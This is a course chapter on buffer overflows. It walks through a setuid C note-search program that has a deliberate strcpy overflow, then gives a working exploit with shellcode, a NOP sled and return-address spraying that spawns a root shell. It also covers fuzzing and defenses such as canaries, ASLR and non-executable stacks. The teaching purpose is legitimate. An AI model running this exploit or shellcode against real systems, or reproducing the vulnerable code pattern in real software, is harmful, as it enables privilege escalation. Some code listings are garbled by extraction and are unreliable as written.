Chapter 10: A Real Buffer Overflow

advertisement
Chapter 10: A Real Buffer Overflow
Objectives:
(a) Describe how a buffer overflow attack can be used to gain root access to a computer.
(b) Describe two techniques that a hacker can use to make it simpler to craft a buffer overflow.
(c) Describe technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
1. Note-Taking and Note-Searching Programs
1.1. Review of Security Exercise 9 Last time in lab you looked at a fascinating program (named note2.c) that takes a
scintillating text string as a command line argument, and then appends the scintillating text string to the end of the fabulous file with
pathname /tmp/notes. The program also appends—to the very front of a note—the user ID of anyone who adds a note. You use
this program in your capacity as Company Commander: anyone in your Company can send you a note. The idea is that you can read
all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by anyone else (and can’t
even read their own notes once submitted). By examining the user ID, you can identify all the “anonymous” (ha, ha) note senders.
The program is repeated below.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
int fd ;
int userid ;
char *buffer ;
buffer = (char *)malloc(100);
strcpy( buffer , argv[ 1 ] );
strncat( buffer , "\n" , 1 );
fd = open( "/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
userid = getuid( ) ;
write( fd , &userid , 4 );
write( fd , “\n” , 1 );
write( fd , buffer , strnlen( buffer ) );
free( buffer );
close( fd );
}
Recall that when you first wrote this program, your company mates could not start immediately sending you notes. You first had to
grant setuid permission by entering: chmod u+s note2.exe.
After that, anyone could run the program, and the program would then execute as though executed by the owner.
tmp/notes that you looked at in the last lab was built as follows:
First you (midshipman) entered: Notes received today:
Then instructor entered: The wardroom fridge might be on the fritz again.
Then matrix entered: Thanks for the notes.
Then joe entered: You suck – worst CC EVER.
Then matrix entered: Great spirit spot-BZ.
1
The file
And you saw all that you had made, and it was very good. And there was evening, and there was morning—the ninth EC312 chapter.
1.2. A New Program The program note2.c is actually practical and useful. But it would be nice for a user to be able to explore
the file /tmp/notes to see the notes that they had entered. Of course they should not be able to view the notes that were written
by anyone else.
For example, given the notes entered as shown above, if joe were to execute this hypothetical program, he would see:
and if matrix runs the program she would see:
Moreover, it would be nice if the program had one additional feature. It would be nice if the user could run the program with the
option of specifying an additional command line argument. This command line argument would be a string, and the improved
program would only return the user's comments containing that string. The following screen capture should illustrate how we would
like the improved program to run.
Presented below is a program, which we will name bettersearchnote.c , that does precisely this. This program is, quite
obviously, the longest program you have seen (or will see!) in EC312. This program is powerful and complex. Our goal is that you
understand the program in general terms. We present the program all at once below, but in the following pages we will describe the
operation of each of its functions one-by-one. So… hang on!
#include<stdio.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int find_user_note( int fd , int user_uid )
{
int note_uid = -1 ;
unsigned char byte ;
int length;
while( note_uid != user_uid )
{
if( read( fd , &note_uid , 4 ) != 4 )
return -1 ;
if(
read( fd , &byte , 1 ) != 1 )
return -1 ;
byte = 0;
length = 0;
2
while( byte != '\n' )
{
if( read( fd , &byte , 1 ) != 1 )
return -1;
length = length + 1 ;
}
}
lseek( fd , length * -1 , SEEK_CUR );
return length ;
}
int print_notes( int fd , int uid , char * searchstring )
{
int note_length ;
char byte = 0 ;
char note_buffer[ 100 ] ;
note_length = find_user_note(
fd , uid );
if( note_length == -1 )
return 0;
read( fd , note_buffer , note_length ) ;
note_buffer[ note_length ] = 0 ;
if(
search_note( note_buffer , searchstring )
printf( note_buffer );
return 1;
}
int search_note( char *note
{
int i;
int keyword_length ;
int match = 0;
, char *keyword
)
keyword_length = strlen( keyword );
if( keyword_length == 0 )
return 1;
for(
{
i = 0
if(
;
i < strlen( note )
; i = i + 1 )
note[i] == keyword[ match ] )
match = match + 1 ;
else
{
if( note[ i ] == keyword[ 0 ] )
match = 1 ;
else
match = 0 ;
}
if ( match == keyword_length )
return 1;
}
return 0;
}
3
)
int main( int argc , char *argv[ ] )
{
int user_id;
int fd;
This innocent looking line of code is a
potential buffer overflow! Do you see why?
int printing = 1;
char searchstring[ 100 ] ;
if( argc > 1 )
strcpy( searchstring , argv[ 1 ] ) ;
else
searchstring[ 0 ] = 0 ;
user_id = getuid( );
fd = open( "/tmp/notes" , O_RDONLY );
while( printing )
printing = print_notes( fd , user_id , searchstring );
close( fd );
}
So, notice that we have four functions: find_user_note , print_notes , search_note and main . We'll start (as all
programs start) with the main function.
The main function
1. int main( int argc , char *argv[ ] )
2. {
3.
int user_id;
4.
int fd;
5.
int printing = 1;
6.
char searchstring[ 100 ] ;
7.
if( argc > 1 )
8.
strcpy( searchstring , argv[ 1 ] ) ;
9.
else
10.
searchstring[ 0 ] = 0 ;
11.
user_id = getuid( );
12.
fd = open( "/tmp/notes" , O_RDONLY );
13.
14.
while( printing )
printing = print_notes( fd , user_id , searchstring );
15.
16. }
close( fd );
Four variables are declared in main. First, the integer user_id is declared in line 3. In line 11, this variable is assigned the ID of
the person running the program. So, for example, if joe is running the program, then user_id will be assigned the value 501.
Next, the integer fd is declared in line 4. This variable will hold the file descriptor for the file /tmp/notes. The variable fd is tied
to the file /tmp/notes in line 12.
Third, the string named searchstring , declared in line 6, will hold the optional command line argument. If argc is greater than
1 then the user did enter the optional argument, and this command line argument is placed in searchstring in line 8. If the user
did not enter the optional command line argument, then zero is placed in searchstring.
The variable printing is initially assigned the value of 1 in line 5. 1, so we will always enter the body of the while loop. (Note
that in C, if a Boolean expression evaluates to an integer other than zero, the Boolean expression is interpreted as true.) This while
loop calls the function named print_notes.
4
We will look at the function print_notes in a moment, but for now, accept on faith that the function print_notes will look for
a note from this user_id containing the searchstring, and if successful, will print out the note to the monitor and then will
return the value 1. If the value 1 is returned by print_notes, the while loop (line 13) will iterate again. That will call the
function print_notes again, and the function will look further into the file /tmp/notes (picking up where it left off) and again
search for a note from this user_id containing the searchstring. The function print_notes will keep setting
printing to 1 so long as the user with ID equal to user_id still has notes in the file /tmp/notes. Eventually, there will be no
more notes in the file /tmp/notes from this user_id containing the desired searchstring, and, at that point, the function
print_notes will return a 0. That ends the while loop's iteration and ends the program.
The print_notes function
1.
2.
3.
4.
5.
Let's now turn our attention to the function print_notes.
int print_notes( int fd , int uid , char * searchstring )
{
int note_length ;
char byte = 0 ;
char note_buffer[ 100 ] ;
6.
note_length = find_user_note(
7.
8
if( note_length == -1 )
return 0;
9.
read( fd , note_buffer , note_length ) ;
10.
note_buffer[ note_length ] = 0 ;
11.
12.
if(
13.
14.
fd , uid );
search_note( note_buffer , searchstring )
printf( note_buffer );
)
return 1;
}
The integer variable note_length is declared on line 3. On line 6, the function named find_user_note is called, and the return
value from this function is placed in note_length. For now, accept on faith that the function find_user_note returns the
length of the next note in the file /tmp/notes that was put there by the user with ID equal to user_id . If the function finds no
such note, it returns -1.
So, at line 7, the variable note_length will contain either the number of bytes that were in a note left by the user running the
program, or will contain the value of -1 if no such note was found. If note_length does equal -1, then zero will be returned to
main on line 8, ending the iteration of the while loop in main.
The read function moves sequentially through a file without backing up. In other words, the read function starts reading from a file
precisely where the last read function left off.
In line 5, a string named note_buffer is declared, and on line 9, we read from the file a number of bytes equal to
note_length into the string note_buffer. The practical effect is that note_buffer now contains the next string that was in
the file /tmp/notes left by the user running the program. We then, in line 10, terminate the string with a NULL.
In line 11, we call the function named search_note giving the function as inputs note_buffer (which contains a string left by
this particular user found in the file /tmp/notes) and the string searchstring (which contains the characters that the user
entered as argv[1] ). If the desired searchstring is found within the string note_buffer, the function search_note
will return 1 and the contents of note_buffer will be printed to the monitor on line 12. This ensures that we only print out notes
from the user running the program if they contain the desired search string.
5
The find_user_note function
1.
2.
3.
4.
5.
int find_user_note( int fd , int user_uid )
{
int note_uid = -1 ;
unsigned char byte ;
int length;
6.
7.
8.
9.
while( note_uid != user_uid )
{
if( read( fd , &note_uid , 4 ) != 4 )
return -1 ;
10.
11.
if(
12.
13.
byte = 0;
length = 0;
14.
15.
16.
17.
while( byte != '\n' )
{
if( read( fd , &byte , 1 ) != 1 )
return -1;
18.
19.
20.
}
}
21.
lseek( fd , length * -1 , SEEK_CUR );
22.
23.
read( fd , &byte , 1 ) != 1 )
return -1 ;
length = length + 1 ;
return length ;
}
The function find_user_note searches through the file with descriptor fd, searching for a note from the user with ID equal to
user_uid. If it finds such a note, it returns the length of that note.
The integer note_uid is declared in line 3 and initialized to -1. Recall that when users run the Company Commander's program to
leave notes in the file /tmp/notes, their user ID is recorded before their note. The intent is that note_uid will hold the user ID
of the note being examined. Since the user ID cannot be equal to -1, the while loop on line 6 always iterates at least once.
The if statement on lines 8-9 reads the user ID from the file /tmp/notes and places this value in note_uid. If we cannot
succeed in reading in the user ID, we must be at the end of the file, and we return a value of -1 on line 9.
The if statement on lines 10-11 reads past newline character which always follows the user ID in the file /tmp/notes. Thus, at
the start of line 14, note_uid contains the user ID of the note that is about to be read from the file, and the read function is
positioned at the first character in this note.
The while loop on lines 14-20 simply reads through the file, byte-by-byte, counting the total number of characters read before a
newline is encountered. The variable length, initialized to zero on line 13, keeps track of this running sum. When we reach a new
line character, the while loop on line 14 stops iterating, and length contains the length of the note left by the user with ID equal to
note_uid.
We then return to line 6, and examine the Boolean expression governing this while loop. If the ID of the user whose note was just
extracted from the file ( note_uid ) is not equal to the note of the person running the program ( user_uid ), then this note that
was just extracted is of no interest to us. We simply execute the while loop on lines 6-20 all over again, placing the ID of the next
note in note_uid and counting up the characters in this next note.
On the other hand if, upon returning to line 6 and examining the Boolean expression governing this while loop, we find that the ID
of the user whose note was just extracted from the file ( note_uid ) is equal to the note of the person running the program (
user_uid ), then we have indeed found a note left by the person running the program. In this case, we exit the line 6 while loop
and jump to line 21.
6
At the start of line 21, we have found a note from the individual running the program, and we know the length of this user's note. But,
unfortunately, in determining the length of the user's note we have read past the end of the user's note in the file /tmp/notes. So, in
line 21, we reset the read function so that we are back at the start of this user's note. We do this by backing up –length characters.
After line 21, the next call to read will start reading the file /tmp/notes at the start of the note of the user whose ID is in
user_uid.
The search_note function
The search_note function takes two arguments: a string containing a note left by the user running the program, and the
searchstring that was entered by the user as a command line argument. If the searchstring is found anywhere within the
note left by the user, the program returns a value of 1. If the searchstring is not found within the user's note, the function returns
a value of 0.
You should be able to navigate through this function given the skills you have developed to date. The gory details of the function are
left as an exercise.
At this point, we’ll break for the Security Exercise. Let's jump to Security Exercise 10! After the Security Exercise is done, we’ll
return to your regularly scheduled lecture.
2. You've Been Hacked!
Back in Chapter 7, we noted that the very first major attack on DoD computer networks took place in February of 1998 and lasted for
over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining
access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been used
countless times ever since. You have just witnessed this buffer overflow in your lab!
Recall that the buffer overflow entails overwriting a buffer in such a way that an executable program is placed in the stack memory.
Earlier in the course, we looked at a buffer overflow in general terms. In that earlier example, recalled in the picture shown below, a
buffer named alpha_code has been overwritten with an executable program that extends beyond the buffer allotted for
alpha_code.
The idea behind the illustration above is that we can overwrite additional stack items, including the return address, which is stored on
the stack. The key for the exploit to work is that the return address must be set to the address of alpha_code! If we manage to set
the return address to the address of alpha_code, then the return address is the address of the start of the executable program.
Then, when the function is done executing, the return address will be retrieved and the executable code that the adversary placed on
the stack will start executing. Again, the exploit involves the adversary placing his own program in memory and making it execute.
7
The program exploit_notesearch.c that you examined in lab simply generates a command string that runs the
bettersearchnote.exe program. The function named system will simply run its argument. So the function call
system(command);
will act as though the user typed in whatever is held the string named command, and then hit return.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
This program will be explained in detail
by a separate PowerPoint presentation.
int main(int argc, char *argv[])
{
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200);
// zero out the new memory
strcpy(command, "./bettersearchnote.exe \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
Now, the string named shellcode contains machine language instructions to open a shell prompt.
This program executes ./bettersearchnote.exe and causes a buffer overflow that overwrites the return address, pointing to
the machine instructions contained in shell code. These instructions will open a shell. So… what’s the big deal you might ask? The
problem is that when a user (any old user) executes bettersearchnote.exe they are running the program as root because
the suid flag is set.
So… with the program running with elevated privileges, whose shell is opened? The answer: root’s
So, armed with a root shell, the hacker now has:
•
•
•
•
full control of the system
the ability to read anyone’s files
the ability to delete anyone’s files
the ability to install any software… including malware.
8
3. How is a Buffer Overflow Performed?
So...how would you perform a buffer overflow?
You would first attempt to see if this C flaw exists by entering a ridiculously long value (but one that you know) when prompted to
enter something, and you would check to see if that causes the program to behave erratically or crash with a segmentation fault. This
is an example of a technique known as “fuzz testing” or “fuzzing”. In general, fuzzing is the attempt to find soft spots in a program.
If successful, you then can analyze the hex dump to see where your input string resides. You then use this info, plus the source code
(usually available for UNIX) to attempt to find where the return address is stored.
Crafting a buffer overflow attack is not easy. Hackers use two clever techniques to make the process a little more manageable.
Calling the contents inserted into the buffer the “payload”, we can say that the payload has three sections:
•
The desired return address is repeated many times at the end of the payload. Why the repetition? This gives the hacker a
number of chances to get the address correctly positioned in the return address field.
•
The executable program (the exploit)
•
A series of NOP instructions (assembly language “no operation” instructions). This series of NOPs is called the “NOP
sled”. Why the NOP sled? It lets the hacker be a little bit off with the return address. The return address just has to
point anywhere within the NOP sled. Otherwise the return address would need to be the precise first address of the
exploit.
4. Defenses Against the Buffer Overflow Attack
How can we prevent a process from being exploited by a buffer overflow?
We mentioned one technique that would surely work: We could add code to the compiler to check the bounds on each and every array
reference (i.e., we can make the compiler responsible for ensuring data integrity). But this would significantly slow down all
programs, and so is not a solution at all—it would be akin to preventing injuries in automobile accidents by imposing a national 5
MPH speed limit.
We can certainly minimize buffer overflow exploits by very careful coding. In the words of a former member of the NSA's elite
hacker unit (the Tailored Access Operations Division) the solution is straightforward: "The bottom line for preventing buffer
overflows is to ensure that bounds are checked before stuffing a string into an array or otherwise using it." The programmer must
realize that she is responsible for data integrity, and must be vigilant in testing and retesting all code for this potential problem.
Several C library functions are notorious for inviting buffer overflow problems. In our EC312 class, the strcpy function is a wellknown culprit. The designers of C have, in fact, provided an improved version of this particular command—the improved version,
named strncpy, introduces some protection against writing beyond the end of an array. The format for the strncpy command is
strncpy(destination_string , source_string , number_of_characters_to_copy)
9
The strncpy command's third argument is the number of characters to copy. The programmer can ensure, through the use of this
third argument, that we do not write beyond the bounds of the string destination_string.
The function scanf was also revised to permit the user to have some control of the total number of characters read in from the
keyboard.
The battle between hackers and programmers never ends. When hackers first started to take advantage of the fact that strcpy allows
us to enter strings of any size into buffers of fixed size, programmers responded by writing the strncpy function. Hackers quickly
learned that if the source string is longer than the specified number of bytes to be copied, the strncpy function does not
automatically append a terminating NULL to the string that is copied. Thus, if the programmer is not careful, a new set of hacks can
be developed, based on the existence of strings sitting in memory without a NULL terminator.
Beyond awareness and careful coding, several technical solutions have been proposed.
The non-executable stack. This approach forbids the operating system from executing instructions that are on the stack. Basically,
with this approach, the eip register would never be permitted to hold an address that is in the stack's address range. Machine
language instructions would not ordinarily be found on the stack (the machine language instructions would be in the text section), so
there is no reason for the eip to ever point to the stack's region in memory.
It must be noted that this solution still poses some problems. First, it does not prevent a buffer overflow; rather, it prevents a buffer
overflow from following through with the execution of machine language instructions that were placed on the stack. This approach
does not protect against an adversary crashing our machine on a segmentation fault. Also, some highly specialized applications
actually depend on having executable code on the stack.
The canary. This approach entails placing a specific known value on the stack just prior to the return address. This known value is
termed a canary (since a canary was used in coal mines to provide an advance indication of danger). An attempt to overwrite the
return address will necessarily overwrite the canary. Before a function returns, the canary is checked to see if it has been altered. If
the canary has been altered, the program is halted.
Hackers have found ways to defeat the use of a canary. First, if known canaries are used (for example, if a canary of -1 is always
used, the hacker can perform a buffer overflow, overwriting the return address while making sure that the canary is overwritten with
the correct value (-1). If the programmer uses a pseudo-random canary, the hacker can attempt to read the canary value as part of the
exploit, taking care to overwrite it with the prior value.
Address Space Layout Randomization (ASLR). In this technique, the stack and the heap are placed in random memory locations,
preventing the hacker from easily predicting the location of the return address. Of course the locations of the stack and the heap are
not completely random, but are usually arranged according to a fixed number of possible options. Starting with Vista, Microsoft used
ASLR with 256 different possible options for the stack-heap layout. A common counter-hack (not covered in this class) involves
using format string vulnerabilities to determine the return address location. Of course hackers are also studying the various layout
options and, eventually but certainly, hacks will be developed for each of the layout options.
Practice Problem 10.1
Briefly describe two technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
Solution:
10
Problems
1.
Order these three main components of a buffer overflow exploit as they will appear on the stack:
shellcode
malicious return address
nop sled
2.
Aside from careful programming and the modification of several specific C commands, list and briefly describe two technical
solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
3.
Explain why the buffer overflow described in this chapter is much more insidious than the buffer overflows described in
Chapter 7.
11
Download